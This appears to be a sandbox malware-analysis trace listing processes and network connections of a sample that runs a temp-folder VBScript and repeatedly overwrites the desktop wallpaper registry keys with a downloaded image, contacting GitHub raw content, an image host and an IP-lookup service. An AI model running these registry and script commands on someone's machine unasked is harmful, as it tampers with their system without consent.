reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| NL | 172.217.23.195:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 195.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image.noelshack.com | udp |
| US | 35.227.215.6:443 | image.noelshack.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
